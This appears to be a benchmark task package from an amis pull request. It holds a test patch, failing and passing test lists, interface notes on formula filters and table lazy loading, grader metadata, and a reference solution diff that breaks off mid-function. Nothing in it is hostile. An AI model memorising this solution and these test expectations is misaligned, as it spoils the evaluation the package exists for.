fa87d1fbb..4c618fa1f 100644 --- a/packages/amis-formula/__tests__/parser.test.ts +++ b/packages/amis-formula/__tests__/parser.test.ts @@ -1,3 +1,4 @@ +import moment from 'moment'; import {parse} from '../src/index'; test('parser:simple', () => { @@ -120,8 +121,12 @@ test('parser:filter', () => { test('parser:filter-escape', () => { expect( parse('\\$abc is ${abc | date: YYYY-MM-DD HH\\:mm\\:ss}', { - 
evalMode: false - }) + evalMode: false, + filters: { + date: (input: any, format = 'LLL', inputFormat = 'X') => + moment(input, inputFormat).format(format) + } + } as any) ).toMatchSnapshot(); }); diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap index b8200254f..c290dc232 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/index.test.tsx.snap @@ -100,6 +100,9 @@ exports[`Renderer:Form 2`] = ` "onSuccess": [Function], "successMessage": "saveSuccess", }, + "context": { + "a": "123", + }, "data": { "a": "123", }, diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap index 17485c66e..f26ffe567 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/initData.test.tsx.snap @@ -204,6 +204,9 @@ exports[`Form:initData:remote 2`] = ` "onSuccess": [Function], "successMessage": undefined, }, + "context": { + "c": "123", + }, "method": "get", "query": { "c": "123", diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap index d87b14148..84cec19c7 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap @@ -2061,10 +2061,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2100,10 +2097,7 @@ exports[`Renderer:transfer follow left mode 1`] = ` <div class="cxd-Tree-item-icons" > - <a - 
data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2725,10 +2719,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" @@ -2764,10 +2755,7 @@ exports[`Renderer:transfer follow left mode 2`] = ` <div class="cxd-Tree-item-icons" > - <a - data-position="left" - data-tooltip="移除该节点" - > + <a> <icon-mock classname="icon icon-minus" icon="minus" diff --git a/packages/amis/__tests__/renderers/Image.test.tsx b/packages/amis/__tests__/renderers/Image.test.tsx index 61389eec5..45192f014 100644 --- a/packages/amis/__tests__/renderers/Image.test.tsx +++ b/packages/amis/__tests__/renderers/Image.test.tsx @@ -216,12 +216,12 @@ describe('Renderer:image', () => { const imgIns = baseElement.querySelector('.cxd-ImageGallery-main img')!; expect(imgIns).toHaveStyle({ - transform: 'scale(1) rotate(0deg)' + transform: 'translate(0px, 0px) scale(1) rotate(0deg)' }); fireEvent.click(actions[1].firstElementChild!); expect(imgIns).toHaveStyle({ - transform: 'scale(1) rotate(90deg)' + transform: 'translate(0px, 0px) scale(1) rotate(90deg)' }); });
[ "evalute:speical characters" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "async-evalute:namespace", "evalute:keywords", "evalute:Math", "evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Function: lexer(input: string, options?: LexerOptions) Location: packages/amis-formula/src/lexer.ts Inputs: - input string – the raw formula source. - options LexerOptions (optional) – may include `evalMode`, `variableMode`, `allowFilter`, and new fields `filters` (object of filter functions) and `isFilter` (function to test whether a name is a filter). When `isFilter` is omitted the function builds one from built‑in filters plus any provided via `options.filters`. Outputs: An array of Token objects representing the lexical stream. Throws on unexpected characters. The added `isFilter` handling allows the lexer to distinguish a pipe (`|`) used as a filter separator from a bitwise‑OR operator, which is exercised in the test “evalute:speical characters”. Function: getTokens(source: string, options?: GetTokensOptions) Location: packages/amis-formula/src/index.ts (exported from the package root) Inputs: - source string – the formula string to tokenise. - options object (optional) – may contain `evalMode` (boolean), `filters` (object mapping filter names to implementations), and other lexer flags. The `filters` field is now accepted and forwarded to the lexer so that filter names are recognised. Outputs: Token[] – the token list produced by `lexer`. The test adds a `filters` object to ensure filter names are known during tokenisation. Function: parse(source: string, options?: ParseOptions) Location: packages/amis-formula/src/index.ts Inputs: - source string – the formula to parse. - options object (optional) – may contain `evalMode`, `variables`, and now a `filters` property (object of filter functions). The parser forwards `filters` to the lexer so that filter names are correctly identified. Outputs: AST (abstract syntax tree) representation of the formula. The test supplies a `date` filter implementation, exercising the new `filters` field. 
Method: Table.loadDeferredRow(row: IRow) Location: packages/amis/src/renderers/Table/index.tsx (class Table) Inputs: - row IRow – a table row marked with `defer: true`. Outputs: void (internal async handling). The method fetches data via the configured `deferApi`, updates row state (`loading`, `loaded`, `error`, `data`), and emits notifications. This behaviour is exercised indirectly by the table’s lazy‑loading logic in the updated code. Function: initChildren(children: Array<any>, depth: number, pindex: number, parentId: string, path?: string): any Location: packages/amis-core/src/store/table.ts Inputs: - children Array<any> – raw child data. - depth number – current tree depth. - pindex number – index of the parent among its siblings. - parentId string – identifier of the parent row. - path string (optional) – dot‑separated path to this node. Outputs: Array of Row model instances with added fields `defer`, `loaded`, `loading`, `error` for lazy loading support. The test suite indirectly validates the new fields via table rendering checks. Function: Row.replaceChildren(children: Array<any>) Location: packages/amis-core/src/store/table.ts (model Row) Inputs: - children Array<any> – new child data for the row. Outputs: void – updates the row’s `children` collection, preserving parent references. Used by the lazy‑loading implementation. Method: Row.markLoading(value: any) Location: packages/amis-core/src/store/table.ts (model Row) Inputs: - value any – truthy to set `loading` flag. Outputs: void – sets the row’s `loading` state. Method: Row.markLoaded(value: any) Location: packages/amis-core/src/store/table.ts (model Row) Inputs: - value any – truthy to set `loaded` flag. Outputs: void – sets the row’s `loaded` state. Method: Row.setError(value: any) Location: packages/amis-core/src/store/table.ts (model Row) Inputs: - value any – error message string. Outputs: void – stores the error message on the row for UI display. 
Method: Row.resetDefered() Location: packages/amis-core/src/store/table.ts (model Row) Inputs: none Outputs: void – clears `error` and resets `loaded` to false, allowing a retry of lazy loading. This is exercised by the UI retry button tested via snapshot changes. Method: Row.setDeferData({children, ...rest}: any) Location: packages/amis-core/src/store/table.ts (model Row) Inputs: - object containing `children` array and other row data. Outputs: void – merges new data into the row, re‑initialises children via initChildren with proper lazy‑loading flags. Used when a deferred row’s data is loaded. Method: Table.syncRows(store, props, rows) Location: packages/amis/src/renderers/Table/index.tsx (static method) Inputs: - store ITableStore – the table store instance. - props TableProps – component props (now includes optional `deferApi`). - rows Array<any> (optional) – raw rows data. Outputs: boolean indicating whether rows were re‑initialised. The method now respects `defer` flags on rows and the new `deferApi` prop. Method: Table.syncSelected() Location: packages/amis/src/renderers/Table/index.tsx (instance method) Inputs: none (uses component state and store). Outputs: void – synchronises selected rows after data changes; unchanged but interacts with new row flags. Method: Table.render() Location: packages/amis/src/renderers/Table/index.tsx (React render method) Inputs: none. Outputs: JSX element. The render now passes the new `translate` prop to Cell for localisation of retry messages. Function: replaceText(schema: any, replaceText?: {[propName: string]: string}, replaceTextIgnoreKeys?: String[] | ((key:string,value:any,object:any)=>boolean)) Location: packages/amis-core/src/utils/replaceText.ts Inputs: - schema any – the schema to process. - replaceText object – mapping of placeholder strings to replacements. - replaceTextIgnoreKeys either an array of keys to ignore or a predicate function. 
Outputs: any – a deep‑cloned schema with text replaced, now supporting a functional ignore predicate as used in the test suite for custom replace‑text handling. Function: insertStyle(style: string, id: string, doc?: Document) Location: packages/amis-core/src/utils/style-helper.ts Inputs: - style string – CSS text. - id string – identifier; now prefixed with `"amis-"` internally. - doc Document (optional). Outputs: void – inserts or updates a style tag; the prefix change is verified by snapshot tests of rendering output. Function: removeCustomStyle(type: string, id: string, doc?: Document) Location: packages/amis-core/src/utils/style-helper.ts Inputs: - type string – optional style type. - id string – identifier; now prefixed with `"amis-"` internally. - doc Document (optional). Outputs: void – removes the style element. Method: Env.replaceTextIgnoreKeys handling Location: packages/amis-core/src/env.tsx (RendererEnv interface) Inputs: - replaceTextIgnoreKeys – can now be a function `(key, value, object) => boolean` in addition to a string array. Outputs: void – enables more flexible ignore logic, exercised by tests passing a function.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 38, "num_modified_lines": 1138, "pr_author": "yinchunyu", "pr_labels": [ "feat", "fix" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-851dba93506fd34484adaa1d720285d572d18ca4392a0c4893fca27c4159fa92R256", "https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-09783eec140bf3c70e8dd5932d5b8108bd6777cd334ea0a27322d0f09586de29L381-R381", "https://github.com/baidu/amis/pull/8515/files?diff=unified&w=0#diff-6a2f7c2cc26a108293bdd2d7ca6ca8d6b06acbf8e2d17424a50526d6affa6f67L276-R276" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue clearly requests schema template updates (adding visible, unit options, table config changes) and the intent is well defined. However, the provided test patch modifies many unrelated test files (formula lexer, parser, UI snapshots, ImageGallery behavior, tree tooltips, etc.) which are not exercised by the described changes, indicating a coupling problem with the test suite. 
This misalignment suggests the primary problem is environment preparation rather than a solvable feature implementation.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests modify amis-formula lexer/parser unrelated to schema changes", "Snapshot updates for Image, Table, Tree components unrelated to the PR", "Added UI interaction tests (dragging, retry button) not covered by the issue" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
1bb988b942739d3f674260f578a69be4dfe659b9
2023-10-26 13:06:19
baidu__amis-8517
diff --git a/docs/zh-CN/components/crud.md b/docs/zh-CN/components/crud.md index d6b2561da..b6ab5a436 100755 --- a/docs/zh-CN/components/crud.md +++ b/docs/zh-CN/components/crud.md @@ -200,11 +200,11 @@ CRUD 组件对数据源接口的数据结构要求如下: | orderDir | 'asc'/'desc' | 排序方式 | | keywords | string | 搜索关键字 | -### 解析Query原始类型 +### 解析 Query 原始类型 > `3.5.0`及以上版本 -`syncLocation`开启后,CRUD在初始化数据域时,将会对url中的Query进行转换,将原始类型的字符串格式的转化为同位类型,目前仅支持**布尔类型** +`syncLocation`开启后,CRUD 在初始化数据域时,将会对 url 中的 Query 进行转换,将原始类型的字符串格式的转化为同位类型,目前仅支持**布尔类型** ``` "true" ==> true @@ -213,7 +213,6 @@ CRUD 组件对数据源接口的数据结构要求如下: 如果只想保持字符串格式,可以设置`"parsePrimitiveQuery": false`关闭该特性,具体效果参考[示例](../../../examples/crud/parse-primitive-query)。 - ## 功能 既然这个渲染器叫增删改查,那接下来分开介绍这几个功能吧。 @@ -584,6 +583,61 @@ Cards 模式支持 [Cards](./cards) 中的所有功能。 } ``` +## 嵌套 + +当行数据中存在 `children` 字段时,CRUD 会自动识别为树形数据,并支持展开收起。 + +```schema: scope="body" +{ + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": "/api/mock2/crud/table2", + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + } + ] +} +``` + +## 嵌套懒加载 + +如果数据量比较大不适合一次性加载,可以配置 `deferApi` 接口,结合行数据中标记 `defer: true` 属性,实现懒加载。 + +```schema: scope="body" +{ + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": "/api/mock2/crud/table6", + "deferApi": "/api/mock2/crud/table6?parentId=${id}", + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + } + ] +} +``` + ## 查询条件表单 大部分表格展示有对数据进行检索的需求,CRUD 自身支持通过配置`filter`,实现查询条件过滤表单。`filter` 配置实际上同 [Form](./form/index) 组件,因此支持绝大部分`form`的功能。 @@ -3173,6 +3227,7 @@ itemAction 里的 onClick 还能通过 `data` 参数拿到当前行的数据, | title | `string` | `""` | 可设置成空,当设置成空时,没有标题栏 | | className | `string` | | 表格外层 Dom 的类名 | | api | [API](../../docs/types/api) | | CRUD 用来获取列表数据的 api。 | +| deferApi | [API](../../docs/types/api) | | 当行数据中有 defer 
属性时,用此接口进一步加载内容 | | loadDataOnce | `boolean` | | 是否一次性加载所有数据(前端分页) | | loadDataOnceFetchOnFilter | `boolean` | `true` | 在开启 loadDataOnce 时,filter 时是否去重新请求 api | | source | `string` | | 数据映射接口返回某字段的值,不设置会默认使用接口返回的`${items}`或者`${rows}`,也可以设置成上层数据源的内容 | diff --git a/docs/zh-CN/components/table.md b/docs/zh-CN/components/table.md index 0efccd914..1667515df 100755 --- a/docs/zh-CN/components/table.md +++ b/docs/zh-CN/components/table.md @@ -1825,6 +1825,7 @@ popOver 的其它配置请参考 [popover](./popover) | type | `string` | | `"type"` 指定为 table 渲染器 | | | title | `string` | | 标题 | | | source | `string` | `${items}` | 数据源, 绑定当前环境变量 | | +| deferApi | [API](../../docs/types/api) | | 当行数据中有 defer 属性时,用此接口进一步加载内容 | | affixHeader | `boolean` | `true` | 是否固定表头 | | | columnsTogglable | `auto` 或者 `boolean` | `auto` | 展示列显示开关, 自动即:列数量大于或等于 5 个时自动开启 | | | placeholder | `string` 或者 `SchemaTpl` | `暂无数据` | 当没数据的时候的文字提示 | | diff --git a/docs/zh-CN/start/getting-started.md b/docs/zh-CN/start/getting-started.md index 6d5d21414..9fac584e3 100644 --- a/docs/zh-CN/start/getting-started.md +++ b/docs/zh-CN/start/getting-started.md @@ -157,6 +157,7 @@ let amisScoped = amis.embed( // requestAdaptor(api) { // // 支持异步,可以通过 api.mockResponse 来设置返回结果,跳过真正的请求发送 // // 此功能自定义 fetcher 的话会失效 + // // api.context 中包含发送请求前的上下文信息 // return api; // } // @@ -758,8 +759,7 @@ let amisScoped = amis.embed( { replaceText: { service: 'http://localhost' - }, - replaceTextKeys: ['api'] + } } ); ``` @@ -778,6 +778,29 @@ type, name, mode, target, reload 如果发现有字段被意外替换了,可以通过设置这个属性来避免 +通过字符串数组或者函数来过滤字段,比如: + +```javascript +let amisScoped = amis.embed( + '#root', + { + type: 'page', + body: { + type: 'service', + api: 'service/api' + } + }, + {}, + { + replaceText: { + service: 'http://localhost' + }, + // replaceTextIgnoreKeys: ['api'], + replaceTextIgnoreKeys: key => key === 'api' + } +); +``` + #### toastPosition Toast 提示弹出位置,默认为`'top-center'`。 diff --git a/docs/zh-CN/types/api.md b/docs/zh-CN/types/api.md index 
de89f2ecf..e806d3fa8 100755 --- a/docs/zh-CN/types/api.md +++ b/docs/zh-CN/types/api.md @@ -591,6 +591,7 @@ amis 的 API 配置,如果无法配置出你想要的请求结构,那么可 - method:当前请求的方式 - data:请求的数据体 - headers:请求的头部信息 + - context: 发送请求时的上下文数据 - **context** 发送请求时的上下文数据 ##### 字符串形式 diff --git a/examples/components/CRUD/Nested.jsx b/examples/components/CRUD/Nested.jsx index 3cbbb96c1..83f40fdf2 100644 --- a/examples/components/CRUD/Nested.jsx +++ b/examples/components/CRUD/Nested.jsx @@ -2,11 +2,9 @@ export default { title: '支持多层嵌套,列数据中有 children 字段即可。(建议不超过10层)', body: { type: 'crud', - api: '/api/mock2/crud/table2', + api: '/api/mock2/crud/table6', + deferApi: '/api/mock2/crud/table6?parentId=${id}', saveOrderApi: '/api/mock2/form/saveData', - expandConfig: { - expand: 'all' - }, draggable: true, columns: [ { diff --git a/mock/cfc/mock/crud/table6.js b/mock/cfc/mock/crud/table6.js new file mode 100644 index 000000000..ed198eddf --- /dev/null +++ b/mock/cfc/mock/crud/table6.js @@ -0,0 +1,527 @@ +function findInTree(tree, id) { + let ret = null; + tree.some(function (item) { + if (item.id == id) { + ret = item; + return true; + } + if (item.children) { + ret = findInTree(item.children, id); + return !!ret; + } + }); + return ret; +} + +module.exports = function (req, res) { + const perPage = 10; + const page = req.query.page || 1; + let items = data.concat(); + if (req.query.parentId) { + const item = findInTree(items, req.query.parentId); + + if (!item) { + res.json({ + status: 404, + msg: 'Not Found' + }); + return; + } + + res.json({ + status: 0, + msg: 'ok', + data: { + ...item, + children: Array.isArray(item.children) + ? 
item.children.map(item => ({ + ...item, + children: undefined, + defer: !!(Array.isArray(item.children) && item.children.length) + })) + : [] + } + }); + return; + } + const ret = { + status: 0, + msg: 'ok', + data: { + count: items.length, + rows: items + .concat() + .splice((page - 1) * perPage, perPage) + .map(item => ({ + ...item, + children: undefined, + defer: !!(Array.isArray(item.children) && item.children.length) + })) + } + }; + res.json(ret); +}; + +module.exports.cache = true; +const data = [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.5', + platform: 'Win 95+', + version: '5.5', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 6', + platform: 'Win 98+', + version: '6', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 7', + platform: 'Win XP SP2+', + version: '7', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'AOL browser (AOL desktop)', + platform: 'Win XP', + version: '6', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 1.0', + platform: 'Win 98+ / OSX.2+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 1.5', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 2.0', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 3.0', + platform: 'Win 2k+ / OSX.3+', + version: '1.9', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Camino 1.0', + platform: 'OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Camino 1.5', + platform: 'OSX.3+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape 7.2', + platform: 'Win 95+ / Mac OS 8.6-9.2', + 
version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape Browser 8', + platform: 'Win 98SE+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape Navigator 9', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.0', + platform: 'Win 95+ / OSX.1+', + version: '1', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.1', + platform: 'Win 95+ / OSX.1+', + version: '1.1', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.2', + platform: 'Win 95+ / OSX.1+', + version: '1.2', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.3', + platform: 'Win 95+ / OSX.1+', + version: '1.3', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.4', + platform: 'Win 95+ / OSX.1+', + version: '1.4', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.5', + platform: 'Win 95+ / OSX.1+', + version: '1.5', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.6', + platform: 'Win 95+ / OSX.1+', + version: '1.6', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.7', + platform: 'Win 98+ / OSX.1+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.8', + platform: 'Win 98+ / OSX.1+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Seamonkey 1.1', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Epiphany 2.20', + platform: 'Gnome', + version: '1.8', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 1.2', + platform: 'OSX.3', + version: '125.5', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 1.3', + platform: 'OSX.3', + version: '312.8', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 2.0', + platform: 'OSX.4+', + version: '419.3', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 3.0', + platform: 'OSX.4+', + version: '522.1', + grade: 'A' + }, + { + 
engine: 'Webkit', + browser: 'OmniWeb 5.5', + platform: 'OSX.4+', + version: '420', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'iPod Touch / iPhone', + platform: 'iPod', + version: '420.1', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'S60', + platform: 'S60', + version: '413', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 7.0', + platform: 'Win 95+ / OSX.1+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 7.5', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 8.0', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 8.5', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.0', + platform: 'Win 95+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.2', + platform: 'Win 88+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.5', + platform: 'Win 88+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera for Wii', + platform: 'Wii', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Nokia N800', + platform: 'N800', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Nintendo DS browser', + platform: 'Nintendo DS', + version: '8.5', + grade: 'C' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.1', + platform: 'KDE 3.1', + version: '3.1', + grade: 'C' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.3', + platform: 'KDE 3.3', + version: '3.3', + grade: 'A' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.5', + platform: 'KDE 3.5', + version: '3.5', + grade: 'A' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 4.5', + platform: 'Mac OS 8-9', + version: '-', + grade: 'X' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 5.1', + platform: 'Mac OS 7.6-9', + version: '1', 
+ grade: 'C' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 5.2', + platform: 'Mac OS 8-X', + version: '1', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'NetFront 3.1', + platform: 'Embedded devices', + version: '-', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'NetFront 3.4', + platform: 'Embedded devices', + version: '-', + grade: 'A' + }, + { + engine: 'Misc', + browser: 'Dillo 0.8', + platform: 'Embedded devices', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Links', + platform: 'Text only', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Lynx', + platform: 'Text only', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'IE Mobile', + platform: 'Windows Mobile 6', + version: '-', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'PSP browser', + platform: 'PSP', + version: '-', + grade: 'C' + }, + { + engine: 'Other browsers', + browser: 'All others', + platform: '-', + version: '-', + grade: 'U' + } +].map(function (item, index) { + return Object.assign({}, item, { + id: index + 1, + children: + Math.random() > 0.5 + ? 
undefined + : [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Other browsers', + browser: 'All others', + platform: '-', + version: '-', + grade: 'U' + } + ].map(function (child, i) { + return Object.assign({}, child, { + id: (index + 1) * 100 + i + 1, + children: [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '1', + grade: 'A' + } + ].map(function (child, i) { + return Object.assign({}, child, { + id: (i + 1) * 100 + (index + 1) * 1000 + i + 1 + }); + }) + }); + }) + }); +}); diff --git a/mock/cfc/mock/index.js b/mock/cfc/mock/index.js index a73d865ce..9b8fe1c3d 100755 --- a/mock/cfc/mock/index.js +++ b/mock/cfc/mock/index.js @@ -27,15 +27,20 @@ module.exports = function (req, res) { return require(file)(req, res); } else if (exist(jsFile)) { let file = require.resolve(path.join(DIRNAME, jsFile)); - delete require.cache[file]; + let mod = require(file); + + if (!mod.cache) { + delete require.cache[file]; + mod = require(file); + } if (req.query.waitSeconds) { return setTimeout(function () { - require(file)(req, res); + mod(req, res); }, parseInt(req.query.waitSeconds, 10) * 1000); } - return require(file)(req, res); + return mod(req, res); } if (exist(jsonFile)) { if (req.query.waitSeconds) { diff --git a/packages/amis-core/package.json b/packages/amis-core/package.json index a5b5d4ca5..e8834b56e 100644 --- a/packages/amis-core/package.json +++ b/packages/amis-core/package.json @@ -61,7 +61,8 @@ "react-intersection-observer": "9.5.2", "react-json-view": "1.21.3", "tslib": "^2.3.1", - 
"uncontrollable": "7.2.1" + "uncontrollable": "7.2.1", + "path-to-regexp": "6.2.0" }, "peerDependencies": { "amis-formula": "*", diff --git a/packages/amis-core/src/env.tsx b/packages/amis-core/src/env.tsx index e63b9c289..830f41098 100644 --- a/packages/amis-core/src/env.tsx +++ b/packages/amis-core/src/env.tsx @@ -131,7 +131,9 @@ export interface RendererEnv { /** * 文本替换的黑名单,因为属性太多了所以改成黑名单的 flags */ - replaceTextIgnoreKeys?: String[]; + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean); /** * 解析url参数 diff --git a/packages/amis-core/src/store/table.ts b/packages/amis-core/src/store/table.ts index e1f3db6a3..42b354875 100644 --- a/packages/amis-core/src/store/table.ts +++ b/packages/amis-core/src/store/table.ts @@ -39,6 +39,45 @@ import {getStoreById} from './manager'; */ const PARTITION_INDEX = 3; +function initChildren( + children: Array<any>, + depth: number, + pindex: number, + parentId: string, + path: string = '' +): any { + depth += 1; + return children.map((item, index) => { + item = isObject(item) + ? item + : { + item + }; + const id = item.__id ?? guid(); + + return { + // id: String(item && (item as any)[self.primaryField] || `${pindex}-${depth}-${key}`), + id: String(id), + parentId: String(parentId), + key: String(`${pindex}-${depth}-${index}`), + path: `${path}${index}`, + depth: depth, + index: index, + newIndex: index, + pristine: item, + data: item, + defer: !!item.defer, + loaded: false, + loading: false, + rowSpans: {}, + children: + item && Array.isArray(item.children) + ? 
